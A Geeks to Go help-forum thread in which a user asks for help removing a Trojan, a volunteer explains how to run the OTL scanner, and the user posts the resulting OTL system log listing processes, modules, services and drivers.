Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Can't remove Trojan, Win32.Agent.Adb, Slow internet, Please help

trojan slow CantRemove Windows

  • This topic is locked This topic is locked

#1
AllenCrown1

AllenCrown1

    New Member

  • Member
  • Pip
  • 5 posts

So yeah, Ive had this Trojan for quite a while now. I found it with Search and Destroy. Couldn't remove it. So I stopped thinking about it.. its been probably 3 or 4 months ive had it. And my internet has been VERY slow. and disconnecting. I thought it was my internet company, But I have a feeling its this trojan.. I cannot remove it with Search and Destroy.. And Im not sure how. I heard its a real bad Trojan. And I would really appreciate any help, Thank you


  • 0

Advertisements


#2
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,793 posts

Hi! My name is zep516 and Welcome to Geekstogo!
I'll do the best I can to resolve your computer issue
Please make sure to carefully read any instruction that I give you. If you're not sure, or if something unexpected happens, don't continue Stop and ask! Never be afraid to ask questions! :)

First

What is the name of the Trojan ? Does spybot give a file path and location where the Trojan is?

Next

Please download OTL to your Desktop
  • Double click on the OTLicon.jpg to run the program. On Vista/Win7 or 8 right click select Run As Administrator to start the program. If prompted by UAC, please allow it.
  • Make sure all other windows are closed and to let it run uninterrupted.
  • Click the Scan All Users checkbox
    and
  • Check the option for All under the Extra Registry section
  • Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan won't take long.
    • When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
    • Please copy (Edit->Select All, Edit->Copy) the contents of these files and post them in your topic
  • OTL.txt <-- Will be opened, maximized
  • Extras.txt <-- Will be minimized on task bar.
Please post the contents of both OTL.txt and Extras.txt files in your next reply.

Thanks
Joe :)
  • 0

#3
AllenCrown1

AllenCrown1

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts

Spybot calls it Win32.Agent.Adb, And im not sure how to find the path and location on Spybot

 

Ok here is OTL.txt...

 

OTL logfile created on: 6/7/2014 2:56:25 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\COCHRAN\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.10.9200.16635)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
7.98 Gb Total Physical Memory | 4.27 Gb Available Physical Memory | 53.47% Memory free
15.96 Gb Paging File | 12.00 Gb Available in Paging File | 75.23% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 931.41 Gb Total Space | 325.74 Gb Free Space | 34.97% Space Free | Partition Type: NTFS
Drive E: | 3.66 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: CDFS
 
Computer Name: COCHRAN-PC | User Name: COCHRAN | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/06/07 14:53:27 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\COCHRAN\Desktop\OTL.exe
PRC - [2014/06/01 15:48:44 | 001,671,504 | ---- | M] (BitTorrent Inc.) -- C:\Users\COCHRAN\AppData\Roaming\uTorrent\uTorrent.exe
PRC - [2014/05/29 05:58:18 | 004,761,920 | ---- | M] (Client Connect LTD) -- C:\Program Files (x86)\SearchProtect\SearchProtect\bin\cltmng.exe
PRC - [2014/05/29 05:58:18 | 003,078,976 | ---- | M] (Client Connect LTD) -- C:\Program Files (x86)\SearchProtect\UI\bin\cltmngui.exe
PRC - [2014/05/29 05:58:18 | 002,497,344 | ---- | M] (Client Connect LTD) -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
PRC - [2014/05/14 05:27:57 | 001,863,856 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_214.exe
PRC - [2014/05/11 22:26:57 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2014/04/27 17:21:45 | 002,557,976 | ---- | M] () -- C:\Program Files (x86)\AVG Secure Search\vprot.exe
PRC - [2014/04/27 17:21:45 | 001,801,240 | ---- | M] (AVG Secure Search) -- C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.0\ToolbarUpdater.exe
PRC - [2014/04/27 17:21:40 | 000,159,768 | ---- | M] () -- C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.0\loggingserver.exe
PRC - [2014/04/25 10:03:52 | 022,415,552 | ---- | M] (Google) -- C:\Program Files (x86)\Google\Drive\googledrivesync.exe
PRC - [2014/04/11 19:45:50 | 001,764,992 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2014/04/11 19:45:42 | 001,390,720 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2014/04/06 21:21:36 | 005,180,432 | ---- | M] (AVG Technologies CZ, s.r.o.) -- C:\Program Files (x86)\AVG\AVG2014\avgui.exe
PRC - [2014/03/27 22:10:20 | 000,291,912 | ---- | M] (AVG Technologies CZ, s.r.o.) -- C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
PRC - [2014/01/23 18:12:52 | 000,091,936 | ---- | M] (PureLeads) -- C:\Program Files (x86)\PureLeads\PureLeadsSvc.exe
PRC - [2014/01/23 18:12:52 | 000,083,232 | ---- | M] (PureLeads) -- C:\Program Files (x86)\PureLeads\PureLeadsTray.exe
PRC - [2014/01/23 18:12:50 | 003,690,784 | ---- | M] (Sendori) -- C:\Program Files (x86)\PureLeads\plsapp.exe
PRC - [2014/01/23 18:12:50 | 000,024,352 | ---- | M] (sendori) -- C:\Program Files (x86)\PureLeads\PureLeads.Service.exe
PRC - [2013/12/30 16:52:28 | 000,936,960 | -HS- | M] (AutoIt Team) -- C:\Users\COCHRAN\d5g5rz7tw8n\SXuWc.exe
PRC - [2013/12/30 16:52:28 | 000,936,960 | -HS- | M] (AutoIt Team) -- C:\Users\COCHRAN\kr2759867s7\jfIajrjGCA.exe
PRC - [2013/11/20 16:43:26 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
PRC - [2013/11/20 16:43:14 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
PRC - [2013/11/01 10:22:46 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\APSDaemon.exe
PRC - [2013/10/30 14:25:56 | 000,566,696 | ---- | M] (Valve Corporation) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe
PRC - [2013/10/30 14:25:54 | 001,820,584 | ---- | M] (Valve Corporation) -- C:\Program Files (x86)\Steam\Steam.exe
PRC - [2013/02/12 21:29:26 | 000,389,928 | ---- | M] () -- C:\Program Files (x86)\Hotspot Shield\bin\hsswd.exe
PRC - [2013/02/12 21:29:22 | 000,536,360 | ---- | M] (AnchorFree Inc.) -- C:\Program Files (x86)\Hotspot Shield\bin\openvpnas.exe
PRC - [2013/02/12 15:30:34 | 000,444,712 | ---- | M] (AnchorFree Inc.) -- C:\Program Files (x86)\Hotspot Shield\HssWPR\HssSrv.exe
PRC - [2013/02/12 15:22:26 | 001,276,712 | ---- | M] (AnchorFree Inc.) -- C:\Program Files (x86)\Hotspot Shield\bin\openvpntray.exe
PRC - [2013/02/12 14:58:00 | 000,598,312 | ---- | M] () -- C:\Program Files (x86)\Hotspot Shield\bin\openvpn.exe
PRC - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
PRC - [2012/12/18 14:08:28 | 000,065,192 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2012/10/16 04:39:00 | 000,646,744 | ---- | M] () -- C:\Program Files (x86)\Bamboo Dock\BambooCore.exe
PRC - [2012/10/08 17:15:50 | 000,039,808 | ---- | M] (Wacom Technology) -- C:\Program Files\Tablet\Pen\WacomHost.exe
PRC - [2012/05/03 13:07:40 | 000,217,256 | ---- | M] (Visicom Media Inc. (Powered by Panda Security)) -- C:\ProgramData\Anti-phishing Domain Advisor\visicom_antiphishing.exe
PRC - [2012/04/04 06:25:00 | 000,295,584 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
PRC - [2011/12/07 13:07:10 | 001,643,936 | ---- | M] (Affinegy, Inc.) -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\dlnaPlugin.exe
PRC - [2011/12/07 13:06:28 | 000,563,104 | ---- | M] (Affinegy, Inc.) -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinService.exe
PRC - [2011/12/07 13:06:26 | 001,884,064 | ---- | M] (Affinegy, Inc.) -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinRouterMonitor.exe
PRC - [2011/12/07 13:06:24 | 007,029,664 | ---- | M] (Affinegy, Inc.) -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinSetup.exe
PRC - [2011/10/05 14:31:46 | 001,652,736 | R--- | M] (AWS Convergence Technologies, Inc.) -- C:\Program Files (x86)\AWS\WeatherBug\Weather.exe
PRC - [2010/11/20 22:24:03 | 001,169,224 | ---- | M] (Microsoft Corporation) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PRC - [2010/11/20 22:23:54 | 000,032,768 | ---- | M] (Microsoft Corporation) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PRC - [2010/04/16 16:10:58 | 000,036,864 | ---- | M] (Realtek) -- C:\Program Files (x86)\REALTEK\11n USB Wireless LAN Utility\RtlService.exe
PRC - [2010/03/25 14:39:22 | 000,490,280 | ---- | M] (Nero AG) -- C:\Program Files (x86)\Nero\Update\NASvc.exe
PRC - [2009/03/05 16:07:20 | 002,260,480 | RHS- | M] (Safer-Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
PRC - [2009/01/26 15:31:10 | 001,153,368 | ---- | M] (Safer Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/06/06 17:45:15 | 000,027,136 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\_multiprocessing.pyd
MOD - [2014/06/06 17:45:14 | 001,159,680 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\_ssl.pyd
MOD - [2014/06/06 17:45:14 | 000,805,888 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\wx._gdi_.pyd
MOD - [2014/06/06 17:45:14 | 000,110,080 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\pywintypes27.dll
MOD - [2014/06/06 17:45:13 | 000,811,008 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\wx._windows_.pyd
MOD - [2014/06/06 17:45:13 | 000,713,216 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\_hashlib.pyd
MOD - [2014/06/06 17:45:13 | 000,070,656 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\wx._html2.pyd
MOD - [2014/06/06 17:45:13 | 000,035,840 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32process.pyd
MOD - [2014/06/06 17:45:13 | 000,025,600 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32pdh.pyd
MOD - [2014/06/06 17:45:13 | 000,024,064 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32pipe.pyd
MOD - [2014/06/06 17:45:12 | 001,062,400 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\wx._controls_.pyd
MOD - [2014/06/06 17:45:12 | 000,686,080 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\unicodedata.pyd
MOD - [2014/06/06 17:45:12 | 000,525,640 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\windows._lib_cacheinvalidation.pyd
MOD - [2014/06/06 17:45:12 | 000,127,488 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\pyexpat.pyd
MOD - [2014/06/06 17:45:12 | 000,119,808 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32file.pyd
MOD - [2014/06/06 17:45:12 | 000,108,544 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32security.pyd
MOD - [2014/06/06 17:45:12 | 000,038,912 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32inet.pyd
MOD - [2014/06/06 17:45:12 | 000,018,432 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32event.pyd
MOD - [2014/06/06 17:45:12 | 000,017,408 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32profile.pyd
MOD - [2014/06/06 17:45:12 | 000,010,240 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\select.pyd
MOD - [2014/06/06 17:45:11 | 001,175,040 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\wx._core_.pyd
MOD - [2014/06/06 17:45:11 | 000,735,232 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\wx._misc_.pyd
MOD - [2014/06/06 17:45:11 | 000,557,056 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\pysqlite2._sqlite.pyd
MOD - [2014/06/06 17:45:11 | 000,364,544 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\pythoncom27.dll
MOD - [2014/06/06 17:45:11 | 000,320,512 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32com.shell.shell.pyd
MOD - [2014/06/06 17:45:11 | 000,167,936 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32gui.pyd
MOD - [2014/06/06 17:45:11 | 000,128,512 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\_elementtree.pyd
MOD - [2014/06/06 17:45:11 | 000,122,368 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\wx._wizard.pyd
MOD - [2014/06/06 17:45:11 | 000,098,816 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32api.pyd
MOD - [2014/06/06 17:45:11 | 000,087,552 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\_ctypes.pyd
MOD - [2014/06/06 17:45:11 | 000,078,336 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\wx._animate.pyd
MOD - [2014/06/06 17:45:11 | 000,045,568 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\_socket.pyd
MOD - [2014/06/06 17:45:11 | 000,022,528 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32ts.pyd
MOD - [2014/06/06 17:45:11 | 000,011,264 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI31802\win32crypt.pyd
MOD - [2014/05/14 05:27:52 | 016,361,136 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll
MOD - [2014/05/11 22:26:29 | 003,839,088 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2014/04/27 17:21:47 | 000,689,688 | ---- | M] () -- C:\Program Files (x86)\Common Files\AVG Secure Search\NativeBrowserApi\18.1.0\NativeBrowserApi.dll
MOD - [2014/04/27 17:21:46 | 000,519,704 | ---- | M] () -- C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.0\log4cplusU.dll
MOD - [2014/04/27 17:21:45 | 002,557,976 | ---- | M] () -- C:\Program Files (x86)\AVG Secure Search\vprot.exe
MOD - [2014/03/24 04:14:59 | 001,603,608 | ---- | M] () -- C:\Program Files (x86)\AVG Secure Search\TBAPI.dll
MOD - [2014/02/12 21:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/02/12 21:58:10 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2013/10/30 14:25:56 | 001,123,240 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\chromehtml.dll
MOD - [2013/10/24 12:45:32 | 000,691,200 | ---- | M] () -- C:\Program Files (x86)\Steam\SDL2.dll
MOD - [2013/10/23 15:07:26 | 020,625,832 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\libcef.dll
MOD - [2013/09/14 02:51:02 | 000,087,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Internet Services\zlib1.dll
MOD - [2013/09/14 02:50:36 | 001,242,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Internet Services\libxml2.dll
MOD - [2013/07/12 03:41:51 | 012,436,480 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\178644ab40108f3becd8b91049a254c3\System.Windows.Forms.ni.dll
MOD - [2013/07/12 03:41:37 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\bfa7a95284aec941f4b03bae0debe07c\System.Drawing.ni.dll
MOD - [2013/07/12 03:40:50 | 007,989,760 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\187c13e8967097d2ed1e5f123e7d890a\System.ni.dll
MOD - [2013/07/12 03:40:35 | 011,499,520 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9a6c1b7af18b4d5a91dc7f8d6617522f\mscorlib.ni.dll
MOD - [2013/06/14 18:49:12 | 001,100,800 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\avcodec-53.dll
MOD - [2013/06/14 18:49:12 | 000,192,000 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\avformat-53.dll
MOD - [2013/06/14 18:49:12 | 000,124,416 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\avutil-51.dll
MOD - [2012/10/16 04:39:00 | 000,646,744 | ---- | M] () -- C:\Program Files (x86)\Bamboo Dock\BambooCore.exe
MOD - [2011/12/07 13:06:32 | 000,022,944 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinServicePS.dll
MOD - [2011/12/07 12:29:02 | 000,669,184 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\gateways\GenericBelkinGatewayLOC.dll
MOD - [2010/08/22 20:01:36 | 007,187,456 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\QtGui4.dll
MOD - [2010/08/22 20:01:08 | 000,325,632 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\QtXml4.dll
MOD - [2010/08/22 20:01:06 | 001,954,304 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\QtCore4.dll
MOD - [2010/08/22 20:01:06 | 000,847,360 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\QtNetwork4.dll
MOD - [2010/08/22 19:32:34 | 000,119,808 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\imageformats\qjpeg4.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2013/09/06 12:32:06 | 000,288,776 | ---- | M] (McAfee, Inc.) [On_Demand | Stopped] -- C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe -- (McComponentHostService)
SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2013/01/27 12:34:32 | 000,379,360 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2013/01/27 12:34:32 | 000,022,056 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2012/12/11 14:07:04 | 000,619,904 | ---- | M] (Wacom Technology, Corp.) [Auto | Running] -- C:\Program Files\Tablet\Pen\WTabletServiceCon.exe -- (WTabletServiceCon)
SRV:64bit: - [2011/07/12 20:52:12 | 000,027,760 | ---- | M] (VIA Technologies, Inc.) [Auto | Running] -- C:\Windows\SysNative\ViakaraokeSrv.exe -- (VIAKaraokeService)
SRV:64bit: - [2011/04/19 16:31:16 | 000,181,760 | ---- | M] () [Auto | Running] -- C:\Program Files\Belkin\Belkin USB Print and Storage Center\BkBackupScheduler.exe -- (Belkin Local Backup Service)
SRV:64bit: - [2010/05/20 15:26:28 | 000,199,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft LifeCam\MSCamS64.exe -- (MSCamSvc)
SRV:64bit: - [2010/02/09 15:55:52 | 000,055,296 | ---- | M] () [Auto | Running] -- C:\Program Files\Belkin\Belkin USB Print and Storage Center\Bkapcs.exe -- (Belkin Network USB Helper)
SRV - [2014/05/29 05:58:18 | 002,497,344 | ---- | M] (Client Connect LTD) [Auto | Running] -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe -- (CltMngSvc)
SRV - [2014/05/14 05:27:59 | 000,257,712 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/05/11 22:26:55 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/04/27 17:21:45 | 001,801,240 | ---- | M] (AVG Secure Search) [Auto | Running] -- C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.0\ToolbarUpdater.exe -- (vToolbarUpdater18.1.0)
SRV - [2014/04/11 19:45:50 | 001,764,992 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/04/11 19:45:42 | 001,390,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/04/03 21:19:10 | 001,473,280 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Stopped] -- C:\Program Files (x86)\AVG\AVG2014\avgfws.exe -- (avgfws)
SRV - [2014/04/01 21:20:52 | 003,655,184 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Stopped] -- C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe -- (AVGIDSAgent)
SRV - [2014/03/27 22:10:20 | 000,291,912 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Running] -- C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe -- (avgwd)
SRV - [2014/01/23 18:12:52 | 000,091,936 | ---- | M] (PureLeads) [Auto | Running] -- C:\Program Files (x86)\PureLeads\PureLeadsSvc.exe -- (PlsvcV1)
SRV - [2014/01/23 18:12:50 | 003,690,784 | ---- | M] (Sendori) [Auto | Running] -- C:\Program Files (x86)\PureLeads\plsapp.exe -- (plsapp)
SRV - [2014/01/23 18:12:50 | 000,024,352 | ---- | M] (sendori) [Auto | Running] -- C:\Program Files (x86)\PureLeads\PureLeads.Service.exe -- (PlsvcV2)
SRV - [2013/10/30 14:25:56 | 000,566,696 | ---- | M] (Valve Corporation) [On_Demand | Running] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2013/02/26 00:32:22 | 001,260,320 | ---- | M] (NVIDIA Corporation) [Auto | Stopped] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2013/02/12 21:29:26 | 000,389,928 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Hotspot Shield\bin\hsswd.exe -- (HssWd)
SRV - [2013/02/12 21:29:22 | 000,536,360 | ---- | M] (AnchorFree Inc.) [Auto | Running] -- C:\Program Files (x86)\Hotspot Shield\bin\openvpnas.exe -- (hshld)
SRV - [2013/02/12 16:03:26 | 000,078,512 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files (x86)\Hotspot Shield\bin\HSSTrayService.exe -- (HssTrayService)
SRV - [2013/02/12 15:30:34 | 000,444,712 | ---- | M] (AnchorFree Inc.) [Auto | Running] -- C:\Program Files (x86)\Hotspot Shield\HssWPR\HssSrv.exe -- (HssSrv)
SRV - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)
SRV - [2013/01/08 13:55:20 | 000,161,536 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2012/12/18 14:08:28 | 000,065,192 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2012/09/12 20:14:21 | 000,131,912 | ---- | M] (Desura Pty Ltd) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Desura\desura_service.exe -- (Desura Install Service)
SRV - [2011/12/07 13:06:28 | 000,563,104 | ---- | M] (Affinegy, Inc.) [Auto | Running] -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinService.exe -- (AffinegyService)
SRV - [2010/04/16 16:10:58 | 000,036,864 | ---- | M] (Realtek) [Auto | Running] -- C:\Program Files (x86)\REALTEK\11n USB Wireless LAN Utility\RtlService.exe -- (RtlService)
SRV - [2010/04/16 16:10:58 | 000,036,864 | ---- | M] (Realtek) [Auto | Running] -- C:\Program Files (x86)\REALTEK\11n USB Wireless LAN Utility\RtlService.exe -- (Realtek11nCU)
SRV - [2010/03/25 14:39:22 | 000,490,280 | ---- | M] (Nero AG) [Auto | Running] -- C:\Program Files (x86)\Nero\Update\NASvc.exe -- (NAUpdate)
SRV - [2010/03/18 13:16:28 | 000,130,384 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2010/02/19 13:37:14 | 000,517,096 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe -- (SwitchBoard)
SRV - [2009/06/10 16:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2009/05/21 22:35:32 | 000,923,136 | ---- | M] (Hewlett-Packard Co.) [Auto | Running] -- C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL -- (HPSLPSVC)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/04/27 17:21:47 | 000,050,464 | ---- | M] (AVG Technologies) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\avgtpx64.sys -- (avgtp)
DRV:64bit: - [2014/04/18 16:41:51 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:64bit: - [2014/04/01 21:03:14 | 000,236,824 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\avgidsdrivera.sys -- (AVGIDSDriver)
DRV:64bit: - [2014/03/31 16:20:54 | 000,274,200 | ---- | M] (AVG Technologies CZ, s.r.o.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\avgtdia.sys -- (Avgtdia)
DRV:64bit: - [2014/03/31 16:06:26 | 000,130,840 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgmfx64.sys -- (Avgmfx64)
